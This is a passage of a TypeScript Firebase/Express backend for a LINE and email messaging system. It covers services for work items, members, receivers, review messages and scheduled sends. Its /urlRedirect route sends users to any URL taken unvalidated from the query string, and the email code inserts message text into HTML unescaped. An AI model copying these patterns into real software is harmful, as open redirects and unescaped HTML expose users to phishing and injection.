if (businessFolder.empty) {
await driveService.createFile(auth, workUpload.work, config.rootFolderId, "folder", now).then(folderId => {
console.log("folderId:", folderId)
businessFolderInfo = { id: folderId }
}).catch(err => {
console.log("error:", err.response)
})
} else {
businessFolderInfo = { id: businessFolder.docs[0].data().id }
}
// if (!businessFolder.empty) {
return driveService.getFileByName(workUpload.task).then(async folders => {
if (folders.empty) {
return driveService.createFile(auth, workUpload.task, businessFolderInfo.id, "folder", now).then(folderId => {
console.log("folderId:", folderId)
}).catch(err => {
console.log("error:", err.response)
})
}
})
// }
})
})
}
/**
* 活動 Item
*/
if (workUpload.activity != "") {
const activities = await workService.getItemByName(work.id, task.id, workUpload.activity)
let memberReceiver: MemberOrganization = {
id: uuidv4(),
name: workUpload.task,
type: "department",
index: new Date().getTime(),
childrenId: [],
parentId: ""
}
if (activities.length == 0) {
// 不存在則建立
console.log("====建立Item====", workUpload.activity)
const activity: Item = {
id: uuidv4(),
name: workUpload.activity,
index: +workUpload.index,
data: {
period: workUpload.date,
time: workUpload.time,
address: workUpload.address,
location: workUpload.location,
invitationUrl: workUpload.invitationUrl,
nursingUrl: workUpload.nursingUrl,
volunteerUrl: workUpload.volunteerUrl
}
}
await workService.setItem(work.id, task.id, activity)
memberReceiver.parentId = activity.id
} else
memberReceiver.parentId = activities[0].id
const snapshot = await receiverService.getReceiverByNameAndParentId(workUpload.task, memberReceiver.parentId)
if (!snapshot.empty)
memberReceiver = snapshot.docs[0].data() as MemberOrganization
// 建立/更新 成員組織根節點
console.log("====建立成員組織根節點====")
await receiverService.setReceiver(memberReceiver)
}
}
}
res.sendStatus(200)
})
export default router<file_sep>/src/services/calculateChildren.ts
import { MemberOrganization } from "../model"
import { getReceiverById, getReceiverByParentId, setReceiver } from "./receiverService"
export const calculateChildren = async (parentId: string): Promise<string[]> => {
const childOrgShapshot = await getReceiverByParentId(parentId)
let childrenIds = new Array<string>()
if (!childOrgShapshot.empty) {
for (const childOrgDoc of childOrgShapshot.docs) {
const childOrg = childOrgDoc.data() as MemberOrganization
const execu = new Array<Promise<any>>()
if (childOrg.type == "department" ) {
execu.push(calculateChildren(childOrg.id).then(temp => {
console.log(childOrg.name, temp.length)
childrenIds.push(...temp)
}))
} else if (childOrg.type == "member") {
childrenIds.push(childOrg.memberId)
}
}
}
childrenIds = childrenIds.filter((element, index, array) => {
return array.indexOf(element) == index
})
const rootOrgSnapshot = await getReceiverById(parentId)
if (!rootOrgSnapshot.empty) {
let rootOrg = rootOrgSnapshot.docs[0].data() as MemberOrganization
if (rootOrg.type == "department" )
rootOrg.childrenId = childrenIds
await setReceiver(rootOrg)
}
return childrenIds
}<file_sep>/src/services/workService.ts
import { firestore } from "firebase-admin"
import { Work, Task, Item, Flow } from "../model"
const workCollection = firestore().collection("Work")
export const setWork = (work: Work) => {
return workCollection.doc(work.id).set(work, { merge: true })
}
export const setTask = (workId: string, task: Task) => {
return workCollection.doc(workId).collection("Task").doc(task.id).set(task, { merge: true })
}
export const setItem = (workId: string, taskId: string, itemData: Item) => {
return workCollection
.doc(workId).collection("Task")
.doc(taskId).collection("Item")
.doc(itemData.id).set(itemData, { merge: true })
}
export const setVisitFlow = (workId: string, taskId: string, itemId: string,flowData: Flow) => {
return workCollection
.doc(workId).collection("Task")
.doc(taskId).collection("Item")
.doc(itemId).collection("Flow")
.doc(flowData.id).set(flowData, { merge: true })
}
export const getWorks = () => {
return workCollection.get()
.then(snapshot => {
return snapshot.docs.map(doc => {
return doc.data() as Work
})
})
}
export const getWorkByName = (name: string) => {
return workCollection.where("name", "==", name).get()
.then(snapshot => {
return snapshot.docs.map(doc => {
return doc.data() as Work
})
})
}
export const getTasks = (workId: string) => {
return workCollection.doc(workId).collection("Task").get()
.then(snapshot => {
return snapshot.docs.map(doc => {
return doc.data() as Task
})
})
}
export const getTaskByName = (workId: string, name: string) => {
return workCollection.doc(workId).collection("Task").where("name", "==", name).get()
.then(snapshot => {
return snapshot.docs.map(doc => {
return doc.data() as Task
})
})
}
export const getItems = (workId: string, taskId: string) => {
return workCollection.doc(workId).collection("Task")
.doc(taskId).collection("Item").get()
.then(snapshot => {
return snapshot.docs.map(doc => {
return doc.data() as Item
})
})
}
export const getItemByName = (workId: string, taskId: string, name: string) => {
return workCollection.doc(workId).collection("Task")
.doc(taskId).collection("Item")
.where("name", "==", name).get()
.then(snapshot => {
return snapshot.docs.map(doc => {
return doc.data() as Item
})
})
}
export const getItemById = (workId: string, taskId: string, id: string) => {
return workCollection.doc(workId).collection("Task")
.doc(taskId).collection("Item")
.where("id", "==", id).get()
.then(snapshot => {
return snapshot.docs.map(doc => {
return doc.data() as Item
})
})
}
export const getFlowByName = (workId: string, taskId: string, itemId: string, name: string) => {
return workCollection.doc(workId).collection("Task")
.doc(taskId).collection("Item")
.doc(itemId).collection("Flow")
.where("name", "==", name).get()
}
<file_sep>/src/services/eventConfigService.ts
import * as admin from 'firebase-admin';
const eventCollection = admin.firestore().collection("EventConfig");
export const setEventConfig = function (event: any) {
return eventCollection.doc(event.id).set(event, { merge: true })
}
// export const setEventMessage = function (eventId: string, message: Metadata) {
// return eventCollection.doc(eventId).collection("Message").add(message)
// }
export const getEventConfig = function (id: string) {
return eventCollection.doc(id).get()
}
// export const getEventById = function (id: string) {
// return eventCollection.doc(id).collection("Message").get()
// }<file_sep>/src/services/menuService.ts
import * as admin from 'firebase-admin';
import { Menu, Item } from '../model';
const menuCollection = admin.firestore().collection("Menu");
export const setMenu = function (org: Menu) {
return menuCollection.doc(org.id).set(org, { merge: true })
}
export const getMenuByParentId = function (parentId: string) {
return admin.firestore().collection("Menu").where("parentId", "==", parentId).get()
}
export const getMenuByType = function (type: string) {
return admin.firestore().collection("Menu").where("type", "==", type).get()
}
export const getMenuByMemberId = function (memberId: string) {
return admin.firestore().collection("Menu").where("memberId", "==", memberId).get()
}
export const getMenuByName = function (name: string) {
return admin.firestore().collection("Menu").where("name", "==", name).get()
}
export const getMenuByNameAndParentId = function (name: string, parentId: string) {
return admin.firestore().collection("Menu").where("name", "==", name).where("parentId", "==", parentId).get()
}
export const getMenuByMemberIdAndParentId = function (memberId: string, parentId: string) {
return admin.firestore().collection("Menu").where("memberId", "==", memberId).where("parentId", "==", parentId).get()
}
export const getMenus = function () {
return admin.firestore().collection("Menu").get()
}
/**
* DBsync
*/
const taskCollection = admin.firestore().collection("Work").doc("d7fa1181-9454-4ee8-8333-21161c574921").collection("Task")
const beforeVisitorActivityCollection = taskCollection.doc("3503d043-78d9-40e0-b7f6-a2de87b2c876").collection("Activity")
const afterVisitorActivityCollection = taskCollection.doc("883cb81c-ecfd-4100-bc62-664c890b3a5f").collection("Activity")
const taskCourseCollection = admin.firestore().collection("Work").doc("befb339f-419c-4834-a023-7405bebb031d").collection("Task")
const beforeCourseActivityCollection = taskCourseCollection.doc("2fb0fbcd-47cf-4cc6-8627-ab7d07921713").collection("Activity")
const afterCourseActivityCollection = taskCourseCollection.doc("4e5d0e3a-afc0-4633-a8b6-1869eaf7afde").collection("Activity")
export const setBeforeActivity = function (activity: any) {
return beforeVisitorActivityCollection.doc(activity.id).set(activity, { merge: true })
}
export const setAfterActivity = function (activity: any) {
return afterVisitorActivityCollection.doc(activity.id).set(activity, { merge: true })
}
export const setBeforeCourseActivity = function (activity: any) {
return beforeCourseActivityCollection.doc(activity.id).set(activity, { merge: true })
}
export const setAfterCourseActivity = function (activity: any) {
return afterCourseActivityCollection.doc(activity.id).set(activity, { merge: true })
}<file_sep>/src/messageRecordWS.ts
import { Router } from "express"
import { firestore } from "firebase-admin"
import * as memberService from "./services/memberService"
import { RecordDetail, MessageRecord } from "./model"
const router = Router()
router.get("/urlRedirect", (req, res) => {
const url = req.query.url
const trackId = req.query.trackId
if (trackId != "system") {
urlOpender(trackId)
}
res.redirect(url)
})
router.post("/memberTimer", (req, res) => {
let member = req.body
if (member.session == "recent") {
setTimeout(function () {
console.log("1 minute")
let newMember = { ...member, session: "active" }
memberService.setMember(newMember)
}, 60000)
}
else if (member.session == "active") {
setTimeout(function () {
console.log("5 minutes")
let newMember = { ...member, session: "sleep" }
memberService.setMember(newMember)
}, 240000)
}
res.sendStatus(200)
})
const urlOpender = async (trackId: string) => {
const messageRecordId = trackId.substring(0, 20)
const recordDetailId = trackId.substring(20)
const messageRecordRef = firestore().collection("MessageRecord").doc(messageRecordId)
const recordDetailRef = messageRecordRef.collection("RecordDetail").doc(recordDetailId)
await firestore().runTransaction(async t1 => {
await t1.get(messageRecordRef).then(async messageRecordDoc => {
if (messageRecordDoc.exists) {
let messageRecord = messageRecordDoc.data() as MessageRecord
await firestore().runTransaction(async t2 => {
await t2.get(recordDetailRef).then(async recordDetailDoc => {
if (recordDetailDoc.exists) {
let recordDetail = recordDetailDoc.data() as RecordDetail
// if (recordDetail.readTime == null) {
// recordDetail.readTime = new Date().getTime()
// messageRecord.readCount += 1
// }
await t2.update(recordDetailRef, recordDetail)
}
})
})
await t1.update(messageRecordRef, messageRecord)
}
})
})
// const messageRecordSnapshot = await getMessageRecordById(messageRecordId)
// if (messageRecordSnapshot.exists) {
// let messageRecord = messageRecordSnapshot.data() as MessageRecord
// const recordDetailSnapshot = await getRecordDetailById(messageRecordId, recordDetailId)
// if (recordDetailSnapshot.exists) {
// let recordDetail = recordDetailSnapshot.data() as RecordDetail
// if (recordDetail.readTime == null) {
// recordDetail.readTime = new Date().getTime()
// messageRecord.readCount += 1
// await updateRecordDetail(messageRecordId, recordDetail)
// await updateMessageRecord(messageRecord)
// }
// }
// }
}
// router.get("/syncGAData", async (req, res) => {
// const records = await getMessageRecord()
// const excuPromises = new Array<Promise<any>>()
// for (const record of records) {
// if (record.label.trackId !== null && record.label.trackId !== "") {
// const messageRecordId = record.label.trackId.substring(0, 20)
// const recordDetailId = record.label.trackId.substring(20)
// if (messageRecordId !== "" && recordDetailId !== "") {
// const recordDetailSnapshot = await getRecordDetailById(messageRecordId, recordDetailId)
// if (recordDetailSnapshot.exists) {
// let recordDetail = recordDetailSnapshot.data() as RecordDetail
// recordDetail.readTime = record.duration
// recordDetail.readCount = record.count
// recordDetail.isRead = true
// excuPromises.push(updateRecordDetail(messageRecordId, recordDetail))
// }
// }
// }
// }
// await Promise.all(excuPromises)
// res.sendStatus(200)
// })
// router.get("/calculate", async (req, res) => {
// const messageRecordsSnapshot = await getMessageRecords()
// if (!messageRecordsSnapshot.empty) {
// for (const messageRecordDoc of messageRecordsSnapshot.docs) {
// let messageRecord = messageRecordDoc.data() as MessageRecord
// const recordDetailsSnapshot = await getRecordDetails(messageRecordDoc.id)
// if (!recordDetailsSnapshot.empty) {
// let readCount = 0
// for (const recordDetailDoc of recordDetailsSnapshot.docs) {
// const recordDetail = recordDetailDoc.data() as RecordDetail
// if (recordDetail.isRead) readCount += 1
// }
// messageRecord.readCount = readCount
// await messageRecordDoc.ref.update(messageRecord)
// }
// }
// }
// res.sendStatus(200)
// })
// const getMessageRecord = async (): Promise<GARecord[]> => {
// const auth = authorize()
// const range = encodeURI("!A16:E")
// const result = await readSheet(auth, gaSpreadsheetId, range)
// const records = new Array<GARecord>()
// for (const row of result) {
// records.push({
// action: row[0],
// label: JSON.parse(row[1]),
// count: parseInt(row[3]),
// duration: parseInt(row[4])
// })
// }
// return records
// }
export default router<file_sep>/src/index.ts
import * as functions from 'firebase-functions';
import * as Express from "express"
import * as Cors from "cors"
import * as Logger from "morgan"
import * as admin from 'firebase-admin';
import { databaseURLPath, serviceAccountPath, storageBucket, prefix, PORT } from './config'
let serviceAccount = require(serviceAccountPath);
admin.initializeApp({
credential: admin.credential.cert(serviceAccount),
databaseURL: databaseURLPath,
storageBucket: storageBucket
});
import { path, permit, authentication } from "./securityConfig"
const settings = { timestampsInSnapshots: true };
admin.firestore().settings(settings);
const app = Express()
app.use(Cors({ origin: true }));
app.use(Logger("dev"))
app.use(Express.json({ limit: '100mb' }));
import webhook from './chatbotWS'
import bindingWS from './bindingWS'
import DriveCrawler from './driveCrawler'
import systemPerformance from './systemPerformance'
import authWS from "./authWS"
import memberParentsWS from "./memberParentsWS"
import healthReportWS from "./healthReport"
import DBsync from './DBsync'
import WorkWS from './workWS'
import MessageRecordWS from "./messageRecordWS"
import pushMessageWS from './pushMessageWS'
import UserWS from "./userWS"
import MemberWS from './memberWS'
import fileWS from './fileWS'
import TemplateWS from "./templateWS"
import PubSubEvent from "./pubSubEvent"
import ReviewMessageWS from "./reviewMessageWS"
app.use(authentication)
app.get(prefix + "/", (req, res) => {
res.sendStatus(200)
})
app.use(prefix + "/", webhook);
app.use(prefix + "/", bindingWS);
app.use(prefix + "/", DriveCrawler);
app.use(prefix + "/", systemPerformance)
app.use(prefix + "/", authWS);
app.use(prefix + "/", memberParentsWS);
app.use(prefix + "/", healthReportWS)
app.use(prefix + "/", DBsync)
app.use(prefix + "/", WorkWS)
app.use(prefix + "/", MessageRecordWS)
app.use(prefix + "/push", pushMessageWS);
app.use(prefix + "/user", UserWS)
app.use(prefix + "/member", MemberWS)
app.use(prefix + "/file", fileWS);
app.use(prefix + "/template", TemplateWS)
app.use(prefix + "/event", PubSubEvent)
app.use(prefix + "/reviewMessage", ReviewMessageWS)
// exports.webservice = functions.https.onRequest(app);
const port = process.argv[2] || PORT
process.on('SIGINT', function () {
console.log("Caught interrupt signal");
process.exit();
});
app.listen(port, function () {
console.log(`Express server listening on port ${port}!`);
});<file_sep>/src/services/emailService.ts
import { createTransport } from "nodemailer"
import Axios from "axios"
import * as driveService from './driveService'
import { appName, emailConfig, backendUrl } from "../config"
import { Member, File } from "../model"
import { Stream } from "stream"
export const pushMessage = (email: string, options: { subject: string, message: string, files?: Array<{ filename: string, content: Buffer, encoding: string }> }): Promise<any> => {
return new Promise((resolve, reject) => {
const transporter = createTransport({
service: "Gmail",
auth: {
type: "OAuth2",
...emailConfig
}
})
let mailOptions = {
from: appName + `<${emailConfig.user}>`,
to: email,
subject: options.subject,
html: options.message,
attachments: options.files
}
transporter.sendMail(mailOptions, error => {
if (error) reject(error)
else resolve("ok")
})
})
}
export const toEmailMessage = async (sender: Member, message: string, trackId: string, files?: Array<{filename: string, content: Buffer, encoding: string}>): Promise<{ subject: string, message: string, files?: Array<{ filename: string, content: Buffer, encoding: string }> }> => {
let emailMessage = {
subject: `《來自${sender.name}》`,
message: message,
files: files
}
if (message) {
const urls = getURLfromString(message)
if (urls)
emailMessage.message = emailMessage.message.replace(urls[0], `<a href="${backendUrl}urlRedirect?trackId=${trackId}&url=${urls[0]}">${urls[0]}</a>`)
emailMessage.message = emailMessage.message.replace(/\n/g, "<br>")
if (sender.path)
emailMessage.subject += sender.path
}
return emailMessage
}
export const getEmailFiles = async (files: File[]): Promise<Array<{filename: string, content: Buffer, encoding: string}>> => {
const emailFiles = []
const auth = await driveService.authorize()
for (const file of files) {
const token = await auth.refreshAccessToken()
const fileStream = await Axios.get(`https://www.googleapis.com/drive/v3/files/${file.id}?alt=media`, {
responseType: "stream",
headers: {
"Authorization": "Bearer " + token.credentials.access_token,
"Content-Type": file.mimeType
}
}).then(result => {
return result.data as Buffer
})
emailFiles.push({
filename: file.fullName,
content: fileStream,
encoding: "base64"
})
}
return emailFiles
}
const getURLfromString = (message: string): string[] => {
const regex = new RegExp(/[-a-zA-Z0-9@:%_\+.~#?&//=]{2,256}\.[a-z]{2,4}\b(\/[-a-zA-Z0-9@:%_\+.~#?&//=]*)?/gi)
return regex.exec(message)
}
// import { createTransport } from "nodemailer"
// import Axios from "axios"
// import * as driveService from './driveService'
// import { appName, emailConfig } from "../config"
// import { Member, File } from "../model"
// export const pushMessage = (email: string, options: { subject: string, message: string, files?: Array<{ filename: string, content: Buffer, encoding: string }> }): Promise<any> => {
// return new Promise((resolve, reject) => {
// const transporter = createTransport({
// service: "Gmail",
// auth: {
// type: "OAuth2",
// ...emailConfig
// }
// })
// let mailOptions = {
// from: appName + `<${emailConfig.user}>`,
// to: email,
// subject: options.subject,
// text: options.message,
// attachments: options.files
// }
// transporter.sendMail(mailOptions, error => {
// if (error) reject(error)
// else resolve("ok")
// })
// })
// }
// export const toEmailMessage = async (sender: Member, message: string, files?: Array<{filename: string, content: Buffer, encoding: string}>): Promise<{ subject: string, message: string, files?: Array<{ filename: string, content: Buffer, encoding: string }> }> => {
// let emailMessage = {
// subject: `《來自${sender.name}》`,
// message: message,
// files: files
// }
// if (message) {
// emailMessage.message = message
// if (sender.path)
// emailMessage.subject += sender.path
// }
// return emailMessage
// }
// export const getEmailFiles = async (files: File[]): Promise<Array<{filename: string, content: Buffer, encoding: string}>> => {
// const emailFiles = []
// const auth = await driveService.authorize()
// for (const file of files) {
// const token = await auth.refreshAccessToken()
// const fileStream = await Axios.get(`https://www.googleapis.com/drive/v3/files/${file.id}?alt=media`, {
// responseType: "stream",
// headers: {
// "Authorization": "Bearer " + token.credentials.access_token,
// "Content-Type": file.mimeType
// }
// }).then(result => {
// return result.data as Buffer
// })
// emailFiles.push({
// filename: file.fullName,
// content: fileStream,
// encoding: "base64"
// })
// }
// return emailFiles
// }<file_sep>/src/services/memberService.ts
import * as admin from 'firebase-admin';
import { idLength } from '../config'
import { Member } from '../model';
const memberCollection = admin.firestore().collection("Member");
export const getMembers = function () {
return memberCollection.where("role", "==", "staff").get()
}
export const getCustomers = function () {
return memberCollection.where("role", "==", "customer").get()
}
export const getStudents = function () {
return memberCollection.where("role", "==", "student").get()
}
export const deleteMember = function (id: string) {
return memberCollection.doc(id).delete()
}
export const setMember = function (member: Member) {
return memberCollection.doc(member.id).set(member, { merge: true })
}
export const getMemberByAnyId = function (id: string) {
if (id.length == idLength.LINE)
return memberCollection.where("lineId", "==", id).get()
if (id.length == idLength.WECHAT)
return memberCollection.where("wechatId", "==", id).get()
return memberCollection.where("id", "==", id).get()
}
export const getMembersByName = function (companyName: string) {
return memberCollection.where("name", "==", companyName).get()
}
export const getMembersByType = function (companyName: string) {
return memberCollection.where("type", "==", companyName).get()
}
export const getMembersByRole = function (companyName: string) {
return memberCollection.where("role", "==", companyName).get()
}
export const getMemberByRoleAndEmail = function (companyName: string, email: string) {
return memberCollection.where("role", "==", companyName).where("email", "==", email).get()
}
export const getMemberByEmail = function (email: string) {
return memberCollection.where("email", "==", email).get()
}
export const getMemberByMobilePhone = function (mobilePhone: string) {
return memberCollection.where("mobilePhone", "==", mobilePhone).get()
}
export const getMembersByBusinessPhone = function (businessPhone: string) {
return memberCollection.where("businessPhone", "==", businessPhone).get()
}
export const getMemberByEmailAndMobilePhone = function (email: string, mobilePhone: string) {
return memberCollection.where("email", "==", email).where("mobilePhone", "==", mobilePhone).get()
}
export const getMemberByMobilePhoneAndName = function (mobilePhone: string, name: string) {
return memberCollection
.where("mobilePhone", "==", mobilePhone)
.where("name", "==", name).get()
}
export const setData = function (result: Member) {
return admin.firestore().collection("Member").doc(result.id).set(result)
}
export const getMemberByIdAndName = function (id: string, name: string) {
return admin.firestore().collection("Member").where("id", "==", id).where("name", "==", name).get()
}
export const deleteFirebaseToken = (lineId: string) => {
return admin.auth().deleteUser(lineId);
}
export const generateFirebaseToken = (lineId: string) => {
let firebaseUid = lineId;
let additionalClaims = {
'LINE': true
};
return admin.auth().createCustomToken(firebaseUid, additionalClaims);
}
export const checkPhoneAuth = (mobile: string) => {
return admin.auth().getUserByPhoneNumber(mobile)
}
export const updateMemberErrorCounter = function (phone: string, errorCounter: number) {
return memberCollection.doc(phone).update({ errorCounter: errorCounter })
}<file_sep>/src/services/reviewMessageService.ts
import * as admin from 'firebase-admin';
import { idLength } from '../config'
import { ReviewMessage , Receiver} from '../model';
const reviewMessageCollection = admin.firestore().collection("ReviewMessage");
export const createReviewMessage = (reviewMessage: ReviewMessage) => {
return reviewMessageCollection.doc(reviewMessage.id).create(reviewMessage)
}
export const createReviewMessageReceivers = (reviewMessageId: string, receiver: Receiver) => {
const collection = reviewMessageCollection.doc(reviewMessageId).collection("Receiver")
return collection.add(receiver)
}
export const getReviewMessageReceivers = (reviewMessageId: string): Promise<Receiver[]> => {
const collection = reviewMessageCollection.doc(reviewMessageId).collection("Receiver")
return collection.get().then(snapshot => {
return snapshot.docs.map(doc => {
return doc.data() as Receiver
})
})
}
export const getReviewMessageById = function (id: string) {
return reviewMessageCollection.where("id", "==", id).get().then(reviewMessageSnapShot => {
if (!reviewMessageSnapShot.empty) {
return reviewMessageSnapShot.docs[0].data() as ReviewMessage
} else { return null }
})
}
export const getReviewMessageByName = function (name: string) {
return reviewMessageCollection.where("name", "==", name).get()
}
export const setReviewMessage = (newReviewMessage: ReviewMessage) => {
return reviewMessageCollection.doc(newReviewMessage.id).set(newReviewMessage, { merge: true })
}
export const deleteReviewMessage = function (id: string) {
return reviewMessageCollection.doc(id).delete()
}<file_sep>/src/scheduleQueue.ts
import * as Queue from "bull"
import * as cluster from "cluster"
import * as admin from "firebase-admin"
import * as PubSub from "@google-cloud/pubsub"
import { databaseURLPath, pubsubConfig, serviceAccountPath, storageBucket, redisConfig, MODE } from './config'
import { ScheduleEvent, EventResult } from "./model"
let serviceAccount = require(serviceAccountPath);
admin.initializeApp({
credential: admin.credential.cert(serviceAccount),
databaseURL: databaseURLPath,
storageBucket: storageBucket
})
const settings = { timestampsInSnapshots: true }
admin.firestore().settings(settings)
import * as reviewMessageService from "./services/reviewMessageService"
import * as eventService from "./services/eventService"
import uuid = require("uuid");
const q = new Queue(redisConfig.name, { redis: redisConfig })
const numWorkers = 10
const pubsub = PubSub({ keyFilename: pubsubConfig.serviceAccountPath })
if (cluster.isMaster) {
for (var i = 0; i < numWorkers; i++) {
cluster.fork()
}
cluster.on('exit', function (worker, code, signal) {
console.log('worker ' + worker.process.pid + ' died')
})
} else {
console.log(`bull server run !`)
q.on("active", () => {
console.log(`bull server active !`)
})
q.on("waiting", () => {
console.log(`bull server waiting !`)
})
q.on("error", (error) => {
console.log(`bull server error: ${error.message} !`)
})
q.on("failed", (error) => {
console.log(`bull server fail !`,error)
})
q.process(async (job) => {
console.log("Process", JSON.stringify(job.data, null, 4))
const event: ScheduleEvent = job.data
let reviewMessageInfo = await reviewMessageService.getReviewMessageById(event.id)
if (reviewMessageInfo && reviewMessageInfo.state == 1) {
let newEvent: EventResult = {
id: uuid.v4(),
messageId: [],
content: reviewMessageInfo.content,
urls: reviewMessageInfo.urls || [],
channel: reviewMessageInfo.channel,
sender: reviewMessageInfo.sender,
// receivers: await reviewMessageService.getReviewMessageReceivers(reviewMessageInfo.id),
timeStamp: new Date().getTime()
}
// console.log(JSON.stringify(newEvent, null, 4))
await eventService.createEvent(newEvent)
const receivers = await reviewMessageService.getReviewMessageReceivers(reviewMessageInfo.id)
const memberCheckExecu = new Array<Promise<any>>()
for (const receiver of await receivers)
memberCheckExecu.push(eventService.createEventReceiver(newEvent.id, receiver))
await Promise.all(memberCheckExecu)
const data = Buffer.from(JSON.stringify({
id: newEvent.id,
timeStamp: newEvent.timeStamp
}))
console.log("pub data", {
id: newEvent.id,
timeStamp: newEvent.timeStamp
})
await pubsub.topic(pubsubConfig.topicName + pubsubConfig.messageTopicName).publisher().publish(data)
reviewMessageInfo.state = 2
await reviewMessageService.setReviewMessage(reviewMessageInfo)
}
})
}<file_sep>/src/services/receiverService.ts
import * as admin from 'firebase-admin';
import { idLength } from '../config'
import { MemberOrganization } from '../model';
const organizationCollection = admin.firestore().collection("Receiver");
export const setReceiver = function (org: MemberOrganization) {
return organizationCollection.doc(org.id).set(org, { merge: true })
}
export const getReceiverById = function (id: string) {
if (id.length == idLength.LINE)
return organizationCollection.where("member.lineId", "==", id).get()
if (id.length == idLength.WECHAT)
return organizationCollection.where("member.wechatId", "==", id).get()
return organizationCollection.where("id", "==", id).get()
}
export const getReceiverByParentIdAndActivityId = function (parentId: string, activityId: string) {
return organizationCollection
.where("parentId", "==", parentId)
.where("activityId", "==", activityId).get()
}
export const getReceiverByParentId = function (parentId: string) {
return organizationCollection.where("parentId", "==", parentId).get()
}
export const getReceiverByType = function (type: string) {
return organizationCollection.where("type", "==", type).get()
}
export const getReceiverByMemberId = function (memberId: string) {
return organizationCollection.where("memberId", "==", memberId).get()
}
export const getReceiverByName = function (name: string) {
return organizationCollection.where("name", "==", name).get()
}
export const getReceiverByNameAndParentId = function (name: string, parentId: string) {
return organizationCollection.where("name", "==", name).where("parentId", "==", parentId).get()
}
export const getReceiverByMemberIdAndParentId = function (memberId: string, parentId: string) {
return organizationCollection.where("memberId", "==", memberId).where("parentId", "==", parentId).get()
}
export const getReceivers = function () {
return organizationCollection.get()
}<file_sep>/src/services/catalogService.ts
import { firestore } from "firebase-admin"
import { Catalog } from "../model"
const catalogCollection = firestore().collection("Catalog")
export const setCatalog = (work: Catalog) => {
return catalogCollection.doc(work.id).set(work, { merge: true })
}
export const getCatalogByNameAndUserId = (name: string, userId: string) => {
return catalogCollection.where("name", "==", name).where("userId", "==", userId).get()
.then(snapshot => {
return snapshot.docs.map(doc => {
return doc.data() as Catalog
})
})
}
export const getCatalogByTypeAndUserId = (type: string, userId: string) => {
return catalogCollection.where("type", "==", type).where("userId", "==", userId).get()
.then(snapshot => {
return snapshot.docs.map(doc => {
return doc.data() as Catalog
})
})
}
export const getCatalogById = (id: string) => {
return catalogCollection.where("id", "==", id).get().then(snapshot => {
return snapshot.docs.map(doc => {
return doc.data() as Catalog
})
})
}
export const deleteCatalog = function (id: string) {
return catalogCollection.doc(id).delete()
}<file_sep>/src/services/lineService.ts
import { Client, Message, FlexComponent } from "@line/bot-sdk"
import * as config from '../config';
// import infos from "./info"
import { File, Member, MessageTemplate } from "../model";
const lineClient = new Client(config.LINE)
export const textMessage = (message: string): Message => {
let textMessage: Message = {
type: "text",
text: message
}
return textMessage
}
// export const listMessage = (results: Array<any>) => {
// let list = ""
// for (let i = 0; i < infos.length; i++) {
// const result = (results[i]) ? results[i] : " "
// list += infos[i] + ":" + result + "\n"
// }
// const textMessage: Message = {
// type: "text",
// text: list
// }
// return textMessage
// }
export const replyMessage = (replyToken: string, lineMessage: Message | Message[]): Promise<any> => {
return lineClient.replyMessage(replyToken, lineMessage)
}
export const pushMessage = (userId: string, lineMessage: Message | Message[]): Promise<any> => {
return lineClient.pushMessage(userId, lineMessage)
}
export const toLineTextMessage = (sender: Member, message: string): Message => {
const textMessage: Message = {
type: "text",
text: `《來自${sender.name}》\n` + message
}
return textMessage
}
/**
* receiver為人
* @param sender
* @param message
* @param files
*/
export const toPersonMessage = (sender: Member, message?: string, storageUrls?: MessageTemplate["urls"], thumb?: string, type?: string): Message | Message[] | null => {
const contents: FlexComponent[] = []
let imgObj = []
let msgObj = []
const urls = getURLfromString(message)
if (urls) {
message = message.replace(urls[0], "")
}
let flexMessage: Message = {
type: "flex",
altText: `《來自${sender.name}》${sender.path ? `\n${sender.path}` : ""}`,
contents: {
type: "bubble",
header: {
type: "box",
layout: "vertical",
contents: [
{
type: "text",
text: `《來自${sender.name}》`,
weight: "bold",
size: "xl",
align: "center"
}
]
},
body: {
type: "box",
layout: "vertical",
contents: contents
}
}
}
if (thumb && thumb != "") {
if (flexMessage.contents.type == "bubble") {
flexMessage.contents.hero =
{
type: "image",
url: encodeURI(decodeURI(thumb)),
size: "full",
aspectRatio: "20:13",
aspectMode: "cover"
}
}
}
if (message && message != "") {
contents.push(
{
type: "box",
layout: "vertical",
contents: [
{ type: "separator" },
{
type: "text",
text: message,
size: "md",
margin: "md",
wrap: true
}
]
},
{
type: "separator",
margin: "md"
}
)
if (urls && urls.length > 0) {
contents.push(
{
type: "button",
action: {
type: "uri",
uri: urls[0],
label: "前往連結"
}
},
{
type: "separator",
margin: "md"
}
)
}
}
if (storageUrls) {
for (const storageUrl of storageUrls) {
let viewerUrl: string = encodeURI(decodeURI(storageUrl.url))
let isImg: boolean = false
switch (viewerUrl.substring(viewerUrl.lastIndexOf(".") + 1, viewerUrl.length).toLowerCase()) {
case "pptx":
case "ppt":
case "docx":
case "doc":
case "xlsx":
case "xls":
viewerUrl = "https://view.officeapps.live.com/op/embed.aspx?src=" + viewerUrl
break
case "pdf":
viewerUrl = "https://docs.google.com/viewerng/viewer?url=" + viewerUrl
break
case "jpg":
case "jpeg":
case "png":
imgObj.push({
"type": "image",
"originalContentUrl": viewerUrl,
"previewImageUrl": viewerUrl
})
console.log("viewerUrl:", viewerUrl)
isImg = true
break
default:
break
}
if (!isImg) {
contents.push(
{
type: "box",
layout: "horizontal",
action: {
type: "uri",
label: "檢視",
uri: `${viewerUrl}`
},
contents: [
{
type: "text",
size: "sm",
text: storageUrl.name,
gravity: "center",
weight: "bold",
flex: 3
},
{
type: "image",
url: "https://ezzeng.ddns.net/icon5/file.png",
align: "start",
margin: "sm",
size: "xxs"
}
]
},
{
type: "separator",
margin: "md"
}
)
}
}
}
if (type) {
switch (type) {
case "11D":
contents.push(
{
type: "button",
action: {
type: "postback",
displayText: "登記",
label: "登記",
data: `type=${type}&action=1`
}
},
{
type: "button",
action: {
type: "datetimepicker",
label: "預排上課時間",
data: `type=${type}&action=2`,
mode: "date"
}
},
{
type: "button",
action: {
type: "postback",
displayText: "暫無法排定,未來會主動通知上課時間",
label: "延期",
data: `type=${type}&action=3`
}
},
{
type: "separator",
margin: "md"
}
)
break
case "14D":
contents.push(
{
type: "button",
action: {
type: "postback",
displayText: "登記",
label: "登記",
data: `type=${type}&action=1`
}
},
{
type: "button",
action: {
type: "datetimepicker",
label: "預排上課時間",
data: `type=${type}&action=2`,
mode: "date"
}
},
{
type: "button",
action: {
type: "postback",
displayText: "暫無法排定,未來會主動通知上課時間",
label: "延期",
data: `type=${type}&action=3`
}
},
{
type: "separator",
margin: "md"
}
)
break
case "21S":
contents.push(
{
type: "button",
action: {
type: "postback",
displayText: "參加",
label: "參加",
data: `type=${type}&action=1`
}
},
{
